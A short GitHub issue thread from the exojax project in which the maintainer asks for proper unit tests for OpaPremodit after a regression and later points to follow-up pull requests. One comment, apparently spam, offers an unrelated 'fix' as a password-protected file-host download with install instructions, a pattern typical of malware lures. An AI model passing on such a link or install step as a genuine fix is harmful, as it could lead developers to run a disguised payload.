### ISSUE TITLE
The unit test for OpaPremodit

### ISSUE THREAD

**Issue by HajimeKawahara** [HajimeKawahara/exojax#522]
The current set of the unit tests was unable to prevent the bug introduced by #515.
Although this bug was fixed in #521, we need to add proper unit tests for `OpaPremodit`.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by HajimeKawahara** [comment]
#523 #524 and in addition #525
